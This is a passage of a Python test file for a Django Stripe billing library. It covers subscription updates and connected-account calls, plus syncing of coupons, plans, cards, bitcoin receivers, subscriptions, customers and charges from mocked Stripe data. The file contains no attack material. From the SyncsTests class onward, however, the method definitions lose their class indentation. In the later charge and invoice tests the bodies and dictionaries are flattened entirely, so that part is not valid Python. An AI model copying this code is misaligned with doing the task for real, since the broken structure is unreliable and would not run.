        self.assertIs(sub, obj)
        self.assertTrue(SyncMock.called)
        _, kwargs = StripeSubMock.call_args
        # Non-connect customers carry no stripe_account.
        self.assertIsNone(kwargs["stripe_account"])

    @patch("stripe.Subscription")
    @patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
    def test_cancel_subscription_with_account(self, SyncMock, StripeSubMock):
        subscription = Subscription(stripe_id="sub_X", customer=self.connected_customer)
        subscriptions.cancel(subscription)
        _, kwargs = StripeSubMock.call_args
        self.assertEqual(kwargs["stripe_account"], self.account.stripe_id)

    @patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
    def test_update(self, SyncMock):
        SubMock = Mock()
        SubMock.customer = self.customer
        obj = object()
        SyncMock.return_value = obj
        sub = subscriptions.update(SubMock)
        self.assertIs(sub, obj)
        self.assertTrue(SubMock.stripe_subscription.save.called)
        self.assertTrue(SyncMock.called)

    @patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
    def test_update_plan(self, SyncMock):
        SubMock = Mock()
        SubMock.customer = self.customer
        subscriptions.update(SubMock, plan="test_value")
        self.assertEqual(SubMock.stripe_subscription.plan, "test_value")
        self.assertTrue(SubMock.stripe_subscription.save.called)
        self.assertTrue(SyncMock.called)

    @patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
    def test_update_plan_quantity(self, SyncMock):
        SubMock = Mock()
        SubMock.customer = self.customer
        subscriptions.update(SubMock, quantity="test_value")
        self.assertEqual(SubMock.stripe_subscription.quantity, "test_value")
        self.assertTrue(SubMock.stripe_subscription.save.called)
        self.assertTrue(SyncMock.called)

    @patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
    def test_update_plan_prorate(self, SyncMock):
        SubMock = Mock()
        SubMock.customer = self.customer
        subscriptions.update(SubMock, prorate=False)
        self.assertEqual(SubMock.stripe_subscription.prorate, False)
        self.assertTrue(SubMock.stripe_subscription.save.called)
        self.assertTrue(SyncMock.called)

    @patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
    def test_update_plan_coupon(self, SyncMock):
        SubMock = Mock()
        SubMock.customer = self.customer
        subscriptions.update(SubMock, coupon="test_value")
        self.assertEqual(SubMock.stripe_subscription.coupon, "test_value")
        self.assertTrue(SubMock.stripe_subscription.save.called)
        self.assertTrue(SyncMock.called)

    @patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
    def test_update_plan_charge_now(self, SyncMock):
        # charge_immediately on a subscription still in trial ends the trial now.
        SubMock = Mock()
        SubMock.customer = self.customer
        SubMock.stripe_subscription.trial_end = time.time() + 1000000.0
        subscriptions.update(SubMock, charge_immediately=True)
        self.assertEqual(SubMock.stripe_subscription.trial_end, "now")
        self.assertTrue(SubMock.stripe_subscription.save.called)
        self.assertTrue(SyncMock.called)

    @patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
    def test_update_plan_charge_now_old_trial(self, SyncMock):
        trial_end = time.time() - 1000000.0
        SubMock = Mock()
        SubMock.customer = self.customer
        SubMock.stripe_subscription.trial_end = trial_end
        subscriptions.update(SubMock, charge_immediately=True)
        # Trial end date hasn't changed
        self.assertEqual(SubMock.stripe_subscription.trial_end, trial_end)
        self.assertTrue(SubMock.stripe_subscription.save.called)
        self.assertTrue(SyncMock.called)

    @patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
    @patch("stripe.Subscription.create")
    def test_subscription_create(self, SubscriptionCreateMock, SyncMock):
        subscriptions.create(self.customer, "the-plan")
        self.assertTrue(SyncMock.called)
        self.assertTrue(SubscriptionCreateMock.called)

    @patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
    @patch("stripe.Subscription.create")
    def test_subscription_create_with_trial(self, SubscriptionCreateMock, SyncMock):
        subscriptions.create(self.customer, "the-plan", trial_days=3)
        self.assertTrue(SubscriptionCreateMock.called)
        _, kwargs = SubscriptionCreateMock.call_args
        self.assertEqual(kwargs["trial_end"].date(), (datetime.datetime.utcnow() + datetime.timedelta(days=3)).date())

    @patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
    @patch("stripe.Subscription.create")
    def test_subscription_create_token(self, SubscriptionCreateMock, CustomerMock):
        subscriptions.create(self.customer, "the-plan", token="token")
        self.assertTrue(SubscriptionCreateMock.called)
        _, kwargs = SubscriptionCreateMock.call_args
        self.assertEqual(kwargs["source"], "token")

    @patch("stripe.Subscription.create")
    def test_subscription_create_with_connect(self, SubscriptionCreateMock):
        SubscriptionCreateMock.return_value = {
            "object": "subscription",
            "id": "sub_XX",
            "application_fee_percent": None,
            "cancel_at_period_end": False,
            "canceled_at": None,
            "current_period_start": 1509978774,
            "current_period_end": 1512570774,
            "ended_at": None,
            "quantity": 1,
            "start": 1509978774,
            "status": "active",
            "trial_start": None,
            "trial_end": None,
            "plan": {
                "id": self.plan.stripe_id,
            }}
        subscriptions.create(self.connected_customer, self.plan.stripe_id)
        # NOTE(review): quantity=4 presumably comes from a project-level
        # quantity hook/setting — confirm against the hookset configuration.
        SubscriptionCreateMock.assert_called_once_with(
            coupon=None,
            customer=self.connected_customer.stripe_id,
            plan="the-plan",
            quantity=4,
            stripe_account="acct_xx",
            tax_percent=None)
        subscription = Subscription.objects.get()
        self.assertEqual(subscription.customer, self.connected_customer)

    @patch("stripe.Subscription.retrieve")
    @patch("stripe.Subscription.create")
    def test_retrieve_subscription_with_connect(self, CreateMock, RetrieveMock):
        CreateMock.return_value = {
            "object": "subscription",
            "id": "sub_XX",
            "application_fee_percent": None,
            "cancel_at_period_end": False,
            "canceled_at": None,
            "current_period_start": 1509978774,
            "current_period_end": 1512570774,
            "ended_at": None,
            "quantity": 1,
            "start": 1509978774,
            "status": "active",
            "trial_start": None,
            "trial_end": None,
            "plan": {
                "id": self.plan.stripe_id,
            }}
        subscriptions.create(self.connected_customer, self.plan.stripe_id)
        subscriptions.retrieve(self.connected_customer, "sub_XX")
        # Retrieval must be scoped to the connected account.
        RetrieveMock.assert_called_once_with("sub_XX", stripe_account=self.account.stripe_id)

    def test_is_period_current(self):
        sub = Subscription(current_period_end=(timezone.now() + datetime.timedelta(days=2)))
        self.assertTrue(subscriptions.is_period_current(sub))

    def test_is_period_current_false(self):
        sub = Subscription(current_period_end=(timezone.now() - datetime.timedelta(days=2)))
        self.assertFalse(subscriptions.is_period_current(sub))

    def test_is_status_current(self):
        sub = Subscription(status="trialing")
        self.assertTrue(subscriptions.is_status_current(sub))

    def test_is_status_current_false(self):
        sub = Subscription(status="canceled")
        self.assertFalse(subscriptions.is_status_current(sub))

    def test_is_valid(self):
        sub = Subscription(status="trialing")
        self.assertTrue(subscriptions.is_valid(sub))

    def test_is_valid_false(self):
        sub = Subscription(status="canceled")
        self.assertFalse(subscriptions.is_valid(sub))

    def test_is_valid_false_canceled(self):
        sub = Subscription(status="trialing", cancel_at_period_end=True, current_period_end=(timezone.now() - datetime.timedelta(days=2)))
        self.assertFalse(subscriptions.is_valid(sub))
class SyncsTests(TestCase):
def setUp(self):
    # Create a fresh user and linked Customer record before each test;
    # the sync tests below read and update this customer row.
    self.User = get_user_model()
    self.user = self.User.objects.create_user(
        username="patrick",
        email="paltman@example.com"
    )
    self.customer = Customer.objects.create(
        user=self.user,
        stripe_id="cus_xxxxxxxxxxxxxxx"
    )
def test_sync_coupon_from_stripe_data(self):
    """Syncing the same coupon id for None vs a connected account yields two distinct rows.

    Fixes: deprecated ``assertEquals`` → ``assertEqual``;
    ``assertFalse(c1 == c2)`` → ``assertNotEqual``.
    """
    account = Account.objects.create(
        stripe_id="acct_X",
        type="standard",
    )
    coupon = {
        "id": "35OFF",
        "object": "coupon",
        "amount_off": None,
        "created": 1391694467,
        "currency": None,
        "duration": "repeating",
        "duration_in_months": 3,
        "livemode": True,
        "max_redemptions": None,
        "metadata": {
        },
        "percent_off": 35,
        "redeem_by": None,
        "times_redeemed": 1,
        "valid": True
    }
    cs1 = coupons.sync_coupon_from_stripe_data(coupon)
    self.assertTrue(cs1.livemode)
    c1 = Coupon.objects.get(stripe_id=coupon["id"], stripe_account=None)
    self.assertEqual(c1, cs1)
    self.assertEqual(c1.percent_off, decimal.Decimal(35.00))
    cs2 = coupons.sync_coupon_from_stripe_data(coupon, stripe_account=account)
    c2 = Coupon.objects.get(stripe_id=coupon["id"], stripe_account=account)
    self.assertEqual(c2, cs2)
    self.assertEqual(c2.percent_off, decimal.Decimal(35.00))
    # Same stripe_id, different account: must be two separate coupons.
    self.assertNotEqual(c1, c2)
@patch("stripe.Plan.auto_paging_iter", create=True)
def test_sync_plans(self, PlanAutoPagerMock):
    """Both plans from the pager are stored with amounts converted from cents.

    Fixes: ``assertTrue(count(), 2)`` passed the 2 as the *msg* argument and
    could never fail — replaced with ``assertEqual``; deprecated
    ``assertEquals`` → ``assertEqual``.
    """
    PlanAutoPagerMock.return_value = [
        {
            "id": "pro2",
            "object": "plan",
            "amount": 1999,
            "created": 1448121054,
            "currency": "usd",
            "interval": "month",
            "interval_count": 1,
            "livemode": False,
            "metadata": {},
            "name": "The Pro Plan",
            "statement_descriptor": "ALTMAN",
            "trial_period_days": 3
        },
        {
            "id": "simple1",
            "object": "plan",
            "amount": 999,
            "created": 1448121054,
            "currency": "usd",
            "interval": "month",
            "interval_count": 1,
            "livemode": False,
            "metadata": {},
            "name": "The Simple Plan",
            "statement_descriptor": "ALTMAN",
            "trial_period_days": 3
        },
    ]
    plans.sync_plans()
    self.assertEqual(Plan.objects.count(), 2)
    self.assertEqual(Plan.objects.get(stripe_id="simple1").amount, decimal.Decimal("9.99"))
@patch("stripe.Plan.auto_paging_iter", create=True)
def test_sync_plans_update(self, PlanAutoPagerMock):
    """Re-syncing after a remote amount change updates the stored plan.

    Fixes: ``assertTrue(count(), 2)`` (msg-argument misuse, never fails) →
    ``assertEqual``; deprecated ``assertEquals`` → ``assertEqual``.
    """
    PlanAutoPagerMock.return_value = [
        {
            "id": "pro2",
            "object": "plan",
            "amount": 1999,
            "created": 1448121054,
            "currency": "usd",
            "interval": "month",
            "interval_count": 1,
            "livemode": False,
            "metadata": {},
            "name": "The Pro Plan",
            "statement_descriptor": "ALTMAN",
            "trial_period_days": 3
        },
        {
            "id": "simple1",
            "object": "plan",
            "amount": 999,
            "created": 1448121054,
            "currency": "usd",
            "interval": "month",
            "interval_count": 1,
            "livemode": False,
            "metadata": {},
            "name": "The Simple Plan",
            "statement_descriptor": "ALTMAN",
            "trial_period_days": 3
        },
    ]
    plans.sync_plans()
    self.assertEqual(Plan.objects.count(), 2)
    self.assertEqual(Plan.objects.get(stripe_id="simple1").amount, decimal.Decimal("9.99"))
    PlanAutoPagerMock.return_value[1].update({"amount": 499})
    plans.sync_plans()
    self.assertEqual(Plan.objects.get(stripe_id="simple1").amount, decimal.Decimal("4.99"))
def test_sync_plan(self):
    """
    Test that a single Plan is updated.

    Fixes: ``assertTrue(count(), 1)`` (msg-argument misuse, never fails) →
    ``assertEqual``; deprecated ``assertEquals`` → ``assertEqual``.
    """
    Plan.objects.create(
        stripe_id="pro2",
        name="Plan Plan",
        interval="month",
        interval_count=1,
        amount=decimal.Decimal("19.99")
    )
    plan = {
        "id": "pro2",
        "object": "plan",
        "amount": 1999,
        "created": 1448121054,
        "currency": "usd",
        "interval": "month",
        "interval_count": 1,
        "livemode": False,
        "metadata": {},
        "name": "Gold Plan",
        "statement_descriptor": "ALTMAN",
        "trial_period_days": 3
    }
    plans.sync_plan(plan)
    # Existing row is updated in place, not duplicated.
    self.assertEqual(Plan.objects.count(), 1)
    self.assertEqual(Plan.objects.get(stripe_id="pro2").name, plan["name"])
def test_sync_payment_source_from_stripe_data_card(self):
    """A card payload creates a local Card record (``assertEquals`` → ``assertEqual``)."""
    source = {
        "id": "card_17AMEBI10iPhvocM1LnJ0dBc",
        "object": "card",
        "address_city": None,
        "address_country": None,
        "address_line1": None,
        "address_line1_check": None,
        "address_line2": None,
        "address_state": None,
        "address_zip": None,
        "address_zip_check": None,
        "brand": "MasterCard",
        "country": "US",
        "customer": "cus_7PAYYALEwPuDJE",
        "cvc_check": "pass",
        "dynamic_last4": None,
        "exp_month": 10,
        "exp_year": 2018,
        "funding": "credit",
        "last4": "4444",
        "metadata": {
        },
        "name": None,
        "tokenization_method": None,
        "fingerprint": "xyz"
    }
    sources.sync_payment_source_from_stripe_data(self.customer, source)
    self.assertEqual(Card.objects.get(stripe_id=source["id"]).exp_year, 2018)
def test_sync_payment_source_from_stripe_data_card_blank_cvc_check(self):
    """A null ``cvc_check`` is stored as the empty string (``assertEquals`` → ``assertEqual``)."""
    source = {
        "id": "card_17AMEBI10iPhvocM1LnJ0dBc",
        "object": "card",
        "address_city": None,
        "address_country": None,
        "address_line1": None,
        "address_line1_check": None,
        "address_line2": None,
        "address_state": None,
        "address_zip": None,
        "address_zip_check": None,
        "brand": "MasterCard",
        "country": "US",
        "customer": "cus_7PAYYALEwPuDJE",
        "cvc_check": None,
        "dynamic_last4": None,
        "exp_month": 10,
        "exp_year": 2018,
        "funding": "credit",
        "last4": "4444",
        "metadata": {
        },
        "name": None,
        "tokenization_method": None,
        "fingerprint": "xyz"
    }
    sources.sync_payment_source_from_stripe_data(self.customer, source)
    self.assertEqual(Card.objects.get(stripe_id=source["id"]).cvc_check, "")
def test_sync_payment_source_from_stripe_data_card_blank_country(self):
    """A null ``country`` is stored as the empty string (``assertEquals`` → ``assertEqual``)."""
    source = {
        "id": "card_17AMEBI10iPhvocM1LnJ0dBc",
        "object": "card",
        "address_city": None,
        "address_country": None,
        "address_line1": None,
        "address_line1_check": None,
        "address_line2": None,
        "address_state": None,
        "address_zip": None,
        "address_zip_check": None,
        "brand": "MasterCard",
        "country": None,
        "customer": "cus_7PAYYALEwPuDJE",
        "cvc_check": "pass",
        "dynamic_last4": None,
        "exp_month": 10,
        "exp_year": 2018,
        "funding": "credit",
        "last4": "4444",
        "metadata": {
        },
        "name": None,
        "tokenization_method": None,
        "fingerprint": "xyz"
    }
    sources.sync_payment_source_from_stripe_data(self.customer, source)
    self.assertEqual(Card.objects.get(stripe_id=source["id"]).country, "")
def test_sync_payment_source_from_stripe_data_card_updated(self):
    """Re-syncing with changed data updates the existing Card (``assertEquals`` → ``assertEqual``)."""
    source = {
        "id": "card_17AMEBI10iPhvocM1LnJ0dBc",
        "object": "card",
        "address_city": None,
        "address_country": None,
        "address_line1": None,
        "address_line1_check": None,
        "address_line2": None,
        "address_state": None,
        "address_zip": None,
        "address_zip_check": None,
        "brand": "MasterCard",
        "country": "US",
        "customer": "cus_7PAYYALEwPuDJE",
        "cvc_check": "pass",
        "dynamic_last4": None,
        "exp_month": 10,
        "exp_year": 2018,
        "funding": "credit",
        "last4": "4444",
        "metadata": {
        },
        "name": None,
        "tokenization_method": None,
        "fingerprint": "xyz"
    }
    sources.sync_payment_source_from_stripe_data(self.customer, source)
    self.assertEqual(Card.objects.get(stripe_id=source["id"]).exp_year, 2018)
    source.update({"exp_year": 2022})
    sources.sync_payment_source_from_stripe_data(self.customer, source)
    self.assertEqual(Card.objects.get(stripe_id=source["id"]).exp_year, 2022)
def test_sync_payment_source_from_stripe_data_source_card(self):
    """A "source"-type object — even one wrapping a card — must not create a Card row."""
    source = {
        "id": "src_123",
        "object": "source",
        "amount": None,
        "client_secret": "src_client_secret_123",
        "created": 1483575790,
        "currency": None,
        "flow": "none",
        "livemode": False,
        "metadata": {},
        "owner": {
            "address": None,
            "email": None,
            "name": None,
            "phone": None,
            "verified_address": None,
            "verified_email": None,
            "verified_name": None,
            "verified_phone": None,
        },
        "status": "chargeable",
        "type": "card",
        "usage": "reusable",
        "card": {
            "brand": "Visa",
            "country": "US",
            "exp_month": 12,
            "exp_year": 2034,
            "funding": "debit",
            "last4": "5556",
            "three_d_secure": "not_supported"
        }
    }
    sources.sync_payment_source_from_stripe_data(self.customer, source)
    # Nothing persisted: only "card" objects are mapped to Card records.
    self.assertFalse(Card.objects.exists())
def test_sync_payment_source_from_stripe_data_bitcoin(self):
    """A bitcoin_receiver payload creates a BitcoinReceiver (``assertEquals`` → ``assertEqual``)."""
    source = {
        "id": "btcrcv_17BE32I10iPhvocMqViUU1w4",
        "object": "bitcoin_receiver",
        "active": False,
        "amount": 100,
        "amount_received": 0,
        "bitcoin_amount": 1757908,
        "bitcoin_amount_received": 0,
        "bitcoin_uri": "bitcoin:test_7i9Fo4b5wXcUAuoVBFrc7nc9HDxD1?amount=0.01757908",
        "created": 1448499344,
        "currency": "usd",
        "description": "Receiver for John Doe",
        "email": "test@example.com",
        "filled": False,
        "inbound_address": "test_7i9Fo4b5wXcUAuoVBFrc7nc9HDxD1",
        "livemode": False,
        "metadata": {
        },
        "refund_address": None,
        "uncaptured_funds": False,
        "used_for_payment": False
    }
    sources.sync_payment_source_from_stripe_data(self.customer, source)
    self.assertEqual(BitcoinReceiver.objects.get(stripe_id=source["id"]).bitcoin_amount, 1757908)
def test_sync_payment_source_from_stripe_data_bitcoin_updated(self):
    """Re-syncing updates the existing BitcoinReceiver (``assertEquals`` → ``assertEqual``)."""
    source = {
        "id": "btcrcv_17BE32I10iPhvocMqViUU1w4",
        "object": "bitcoin_receiver",
        "active": False,
        "amount": 100,
        "amount_received": 0,
        "bitcoin_amount": 1757908,
        "bitcoin_amount_received": 0,
        "bitcoin_uri": "bitcoin:test_7i9Fo4b5wXcUAuoVBFrc7nc9HDxD1?amount=0.01757908",
        "created": 1448499344,
        "currency": "usd",
        "description": "Receiver for John Doe",
        "email": "test@example.com",
        "filled": False,
        "inbound_address": "test_7i9Fo4b5wXcUAuoVBFrc7nc9HDxD1",
        "livemode": False,
        "metadata": {
        },
        "refund_address": None,
        "uncaptured_funds": False,
        "used_for_payment": False
    }
    sources.sync_payment_source_from_stripe_data(self.customer, source)
    self.assertEqual(BitcoinReceiver.objects.get(stripe_id=source["id"]).bitcoin_amount, 1757908)
    source.update({"bitcoin_amount": 1886800})
    sources.sync_payment_source_from_stripe_data(self.customer, source)
    self.assertEqual(BitcoinReceiver.objects.get(stripe_id=source["id"]).bitcoin_amount, 1886800)
def test_sync_subscription_from_stripe_data(self):
    """Subscription sync persists status and, on re-sync, the discount (``assertEquals`` → ``assertEqual``)."""
    Plan.objects.create(stripe_id="pro2", interval="month", interval_count=1, amount=decimal.Decimal("19.99"))
    subscription = {
        "id": "sub_7Q4BX0HMfqTpN8",
        "object": "subscription",
        "application_fee_percent": None,
        "cancel_at_period_end": False,
        "canceled_at": None,
        "current_period_end": 1448758544,
        "current_period_start": 1448499344,
        "customer": self.customer.stripe_id,
        "discount": None,
        "ended_at": None,
        "metadata": {
        },
        "plan": {
            "id": "pro2",
            "object": "plan",
            "amount": 1999,
            "created": 1448121054,
            "currency": "usd",
            "interval": "month",
            "interval_count": 1,
            "livemode": False,
            "metadata": {
            },
            "name": "The Pro Plan",
            "statement_descriptor": "ALTMAN",
            "trial_period_days": 3
        },
        "quantity": 1,
        "start": 1448499344,
        "status": "trialing",
        "tax_percent": None,
        "trial_end": 1448758544,
        "trial_start": 1448499344
    }
    sub = subscriptions.sync_subscription_from_stripe_data(self.customer, subscription)
    self.assertEqual(Subscription.objects.get(stripe_id=subscription["id"]), sub)
    self.assertEqual(sub.status, "trialing")
    # A second sync carrying a discount attaches the coupon locally.
    subscription["discount"] = {
        "object": "discount",
        "coupon": {
            "id": "35OFF",
            "object": "coupon",
            "amount_off": None,
            "created": 1391694467,
            "currency": None,
            "duration": "repeating",
            "duration_in_months": 3,
            "livemode": False,
            "max_redemptions": None,
            "metadata": {
            },
            "percent_off": 35,
            "redeem_by": None,
            "times_redeemed": 1,
            "valid": True
        },
        "customer": self.customer.stripe_id,
        "end": 1399384361,
        "start": 1391694761,
        "subscription": subscription["id"]
    }
    subscriptions.sync_subscription_from_stripe_data(self.customer, subscription)
    d = Subscription.objects.get(stripe_id=subscription["id"]).discount
    self.assertEqual(d.coupon.percent_off, decimal.Decimal(35.00))
def test_sync_subscription_from_stripe_data_updated(self):
    """Re-sync updates status and creates the Discount record (``assertEquals`` → ``assertEqual``)."""
    Plan.objects.create(stripe_id="pro2", interval="month", interval_count=1, amount=decimal.Decimal("19.99"))
    subscription = {
        "id": "sub_7Q4BX0HMfqTpN8",
        "object": "subscription",
        "application_fee_percent": None,
        "cancel_at_period_end": False,
        "canceled_at": None,
        "current_period_end": 1448758544,
        "current_period_start": 1448499344,
        "customer": self.customer.stripe_id,
        "discount": {
            "object": "discount",
            "coupon": {
                "id": "35OFF",
                "object": "coupon",
                "amount_off": None,
                "created": 1391694467,
                "currency": None,
                "duration": "repeating",
                "duration_in_months": 3,
                "livemode": False,
                "max_redemptions": None,
                "metadata": {
                },
                "percent_off": 35,
                "redeem_by": None,
                "times_redeemed": 1,
                "valid": True
            },
            "customer": self.customer.stripe_id,
            "end": 1399384361,
            "start": 1391694761,
            "subscription": "sub_7Q4BX0HMfqTpN8"
        },
        "ended_at": None,
        "metadata": {
        },
        "plan": {
            "id": "pro2",
            "object": "plan",
            "amount": 1999,
            "created": 1448121054,
            "currency": "usd",
            "interval": "month",
            "interval_count": 1,
            "livemode": False,
            "metadata": {
            },
            "name": "The Pro Plan",
            "statement_descriptor": "ALTMAN",
            "trial_period_days": 3
        },
        "quantity": 1,
        "start": 1448499344,
        "status": "trialing",
        "tax_percent": None,
        "trial_end": 1448758544,
        "trial_start": 1448499344
    }
    # No discount exists before the first sync.
    with self.assertRaises(Discount.DoesNotExist):
        Discount.objects.get(subscription__stripe_id="sub_7Q4BX0HMfqTpN8")
    subscriptions.sync_subscription_from_stripe_data(self.customer, subscription)
    self.assertEqual(Subscription.objects.get(stripe_id=subscription["id"]).status, "trialing")
    subscription.update({"status": "active"})
    subscriptions.sync_subscription_from_stripe_data(self.customer, subscription)
    s = Subscription.objects.get(stripe_id=subscription["id"])
    self.assertEqual(s.status, "active")
    self.assertTrue(Discount.objects.filter(subscription__stripe_id="sub_7Q4BX0HMfqTpN8").exists())
    self.assertEqual(s.discount.coupon.stripe_id, "35OFF")
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
@patch("pinax.stripe.actions.sources.sync_payment_source_from_stripe_data")
@patch("stripe.Customer.retrieve")
def test_sync_customer(self, RetrieveMock, SyncPaymentSourceMock, SyncSubscriptionMock):
    """Customer sync stores balance/currency/delinquency and fans out to source/subscription sync.

    Fixes: deprecated ``assertEquals`` → ``assertEqual``; misspelled
    ``RetreiveMock`` parameter renamed.
    """
    RetrieveMock.return_value = dict(
        account_balance=1999,
        currency="usd",
        delinquent=False,
        default_source=None,
        sources=dict(data=[Mock()]),
        subscriptions=dict(data=[Mock()])
    )
    customers.sync_customer(self.customer)
    customer = Customer.objects.get(user=self.user)
    # 1999 cents → 19.99 dollars.
    self.assertEqual(customer.account_balance, decimal.Decimal("19.99"))
    self.assertEqual(customer.currency, "usd")
    self.assertEqual(customer.delinquent, False)
    # A null default_source is stored as the empty string.
    self.assertEqual(customer.default_source, "")
    self.assertTrue(SyncPaymentSourceMock.called)
    self.assertTrue(SyncSubscriptionMock.called)
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
@patch("pinax.stripe.actions.sources.sync_payment_source_from_stripe_data")
def test_sync_customer_no_cu_provided(self, SyncPaymentSourceMock, SyncSubscriptionMock):
    """Passing the stripe customer dict directly skips the API retrieve.

    Fix: deprecated ``assertEquals`` → ``assertEqual``.
    """
    cu = dict(
        account_balance=1999,
        currency="usd",
        delinquent=False,
        default_source=None,
        sources=dict(data=[Mock()]),
        subscriptions=dict(data=[Mock()])
    )
    customers.sync_customer(self.customer, cu=cu)
    customer = Customer.objects.get(user=self.user)
    self.assertEqual(customer.account_balance, decimal.Decimal("19.99"))
    self.assertEqual(customer.currency, "usd")
    self.assertEqual(customer.delinquent, False)
    self.assertEqual(customer.default_source, "")
    self.assertTrue(SyncPaymentSourceMock.called)
    self.assertTrue(SyncSubscriptionMock.called)
@patch("pinax.stripe.actions.customers.purge_local")
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
@patch("pinax.stripe.actions.sources.sync_payment_source_from_stripe_data")
@patch("stripe.Customer.retrieve")
def test_sync_customer_purged_locally(self, RetrieveMock, SyncPaymentSourceMock, SyncSubscriptionMock, PurgeLocalMock):
    """A customer already purged locally is not re-fetched, synced, or re-purged."""
    self.customer.date_purged = timezone.now()
    customers.sync_customer(self.customer)
    for mocked in (RetrieveMock, SyncPaymentSourceMock, SyncSubscriptionMock, PurgeLocalMock):
        self.assertFalse(mocked.called)
@patch("pinax.stripe.actions.customers.purge_local")
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
@patch("pinax.stripe.actions.sources.sync_payment_source_from_stripe_data")
@patch("stripe.Customer.retrieve")
def test_sync_customer_purged_remotely_not_locally(self, RetrieveMock, SyncPaymentSourceMock, SyncSubscriptionMock, PurgeLocalMock):
    """A customer deleted on Stripe triggers a local purge instead of a sync."""
    RetrieveMock.return_value = {"deleted": True}
    customers.sync_customer(self.customer)
    for sync_mock in (SyncPaymentSourceMock, SyncSubscriptionMock):
        self.assertFalse(sync_mock.called)
    self.assertTrue(PurgeLocalMock.called)
@patch("pinax.stripe.actions.invoices.sync_invoice_from_stripe_data")
@patch("stripe.Customer.retrieve")
def test_sync_invoices_for_customer(self, RetreiveMock, SyncMock):
RetreiveMock().invoices().data = [Mock()]
invoices.sync_invoices_for_customer(self.customer)
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("stripe.Customer.retrieve")
def test_sync_charges_for_customer(self, RetreiveMock, SyncMock):
RetreiveMock().charges().data = [Mock()]
charges.sync_charges_for_customer(self.customer)
self.assertTrue(SyncMock.called)
def test_sync_charge_from_stripe_data(self):
data = {
"id": "ch_17A1dUI10iPhvocMOecpvQlI",
"object": "charge",
"amount": 200,
"amount_refunded": 0,
"application_fee": None,
"balance_transaction": "txn_179l3zI10iPhvocMhvKxAer7",
"captured": True,
"created": 1448213304,
"currency": "usd",
"customer": self.customer.stripe_id,
"description": None,
"destination": None,
"dispute": None,
"failure_code": None,
"failure_message": None,
"fraud_details": {
},
"invoice": "in_17A1dUI10iPhvocMSGtIfUDF",
"livemode": False,
"metadata": {
},
"paid": True,
"receipt_email": None,
"receipt_number": None,
"refunded": False,
"refunds": {
"object": "list",
"data": [
],
"has_more": False,
"total_count": 0,
"url": "/v1/charges/ch_17A1dUI10iPhvocMOecpvQlI/refunds"
},
"shipping": None,
"source": {
"id": "card_179o0lI10iPhvocMZgdPiR5M",
"object": "card",
"address_city": None,
"address_country": None,
"address_line1": None,
"address_line1_check": None,
"address_line2": None,
"address_state": None,
"address_zip": None,
"address_zip_check": None,
"brand": "Visa",
"country": "US",
"customer": "cus_7ObCqsp1NGVT6o",
"cvc_check": None,
"dynamic_last4": None,
"exp_month": 10,
"exp_year": 2019,
"funding": "credit",
"last4": "4242",
"metadata": {
},
"name": None,
"tokenization_method": None
},
"statement_descriptor": "A descriptor",
"status": "succeeded"
}
charges.sync_charge_from_stripe_data(data)
charge = Charge.objects.get(customer=self.customer, stripe_id=data["id"])
self.assertEquals(charge.amount, decimal.Decimal("2"))
def test_sync_charge_from_stripe_data_balance_transaction(self):
data = {
"id": "ch_17A1dUI10iPhvocMOecpvQlI",
"object": "charge",
"amount": 200,
"amount_refunded": 0,
"application_fee": None,
"balance_transaction": {
"id": "txn_19XJJ02eZvKYlo2ClwuJ1rbA",
"object": "balance_transaction",
"amount": 999,
"available_on": 1483920000,
"created": 1483315442,
"currency": "usd",
"description": None,
"fee": 59,
"fee_details": [
{
"amount": 59,
"application": None,
"currency": "usd",
"description": "Stripe processing fees",
"type": "stripe_fee"
}
],
"net": 940,
"source": "ch_19XJJ02eZvKYlo2CHfSUsSpl",
"status": "pending",
"type": "charge"
},
"captured": True,
"created": 1448213304,
"currency": "usd",
"customer": self.customer.stripe_id,
"description": None,
"destination": None,
"dispute": None,
"failure_code": None,
"failure_message": None,
"fraud_details": {
},
"invoice": "in_17A1dUI10iPhvocMSGtIfUDF",
"livemode": False,
"metadata": {
},
"paid": True,
"receipt_email": None,
"receipt_number": None,
"refunded": False,
"refunds": {
"object": "list",
"data": [
],
"has_more": False,
"total_count": 0,
"url": "/v1/charges/ch_17A1dUI10iPhvocMOecpvQlI/refunds"
},
"shipping": None,
"source": {
"id": "card_179o0lI10iPhvocMZgdPiR5M",
"object": "card",
"address_city": None,
"address_country": None,
"address_line1": None,
"address_line1_check": None,
"address_line2": None,
"address_state": None,
"address_zip": None,
"address_zip_check": None,
"brand": "Visa",
"country": "US",
"customer": "cus_7ObCqsp1NGVT6o",
"cvc_check": None,
"dynamic_last4": None,
"exp_month": 10,
"exp_year": 2019,
"funding": "credit",
"last4": "4242",
"metadata": {
},
"name": None,
"tokenization_method": None
},
"statement_descriptor": "A descriptor",
"status": "succeeded"
}
charges.sync_charge_from_stripe_data(data)
charge = Charge.objects.get(customer=self.customer, stripe_id=data["id"])
self.assertEquals(charge.amount, decimal.Decimal("2"))
self.assertEquals(charge.available, False)
self.assertEquals(charge.fee, decimal.Decimal("0.59"))
self.assertEquals(charge.currency, "usd")
def test_sync_charge_from_stripe_data_description(self):
data = {
"id": "ch_17A1dUI10iPhvocMOecpvQlI",
"object": "charge",
"amount": 200,
"amount_refunded": 0,
"application_fee": None,
"balance_transaction": "txn_179l3zI10iPhvocMhvKxAer7",
"captured": True,
"created": 1448213304,
"currency": "usd",
"customer": self.customer.stripe_id,
"description": "This was a charge for awesome.",
"destination": None,
"dispute": None,
"failure_code": None,
"failure_message": None,
"fraud_details": {
},
"invoice": "in_17A1dUI10iPhvocMSGtIfUDF",
"livemode": False,
"metadata": {
